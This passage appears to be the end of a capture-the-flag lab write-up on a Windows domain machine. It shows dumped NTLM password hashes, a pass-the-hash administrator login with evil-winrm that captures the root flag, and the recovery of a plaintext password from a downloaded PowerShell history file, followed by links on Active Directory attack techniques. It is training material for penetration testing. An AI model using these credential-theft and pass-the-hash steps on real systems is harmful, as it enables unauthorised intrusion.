DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
tyler:1008:aad3b435b51404eeaad3b435b51404ee:b3beb663d0d8462f9d1360551097f207:::
And we get the root flag
┌─[vpn.coursestack.com 10.200.80.207]─[jimmex@attacker]─[~/hacksmarter/past]
└──╼ [★]$ evil-winrm -i 10.1.105.35 -u administrator -H
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
HSM{HFIU9259FJHJKB091<REALLY !>}
*Evil-WinRM* PS C:\Users\Administrator\Documents>
It still needs the user's ryan clear password so let's try to figure that out
before digging in DPAPI, browsers stuff is PowerShell history at %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt so using smbclient.py I downloaded it
And looks like the administrator added the user through PowerShell so we got the password
┌─[vpn.coursestack.com 10.200.80.207]─[jimmex@attacker]─[~/hacksmarter/past]
└──╼ [★]$ cat ConsoleHost_history.txt
net user ryan 1qaz3ed<QUARTER BACK> /add
net localgroup administrators /add ryan
exit
net computer
Get-ADComputer -Filter * | Select-Object Name
net use \\dev01\c$
whoami
id
net localgroup administrators
net group "domain admins"
exit
Path

Resources
- https://github.com/SecuraBV/Timeroast
- https://hashcat.net/wiki/doku.php?id=example_hashes
- https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smb/index.html
- https://github.com/garrettfoster13/pre2k
- https://github.com/SpecterOps/BloodHound
- https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/acl-persistence-abuse.html
- https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/resource-based-constrained-delegation.html
- https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/s4u2pwnage.html
- https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/dcsync.html
- https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/dpapi-secrets.html
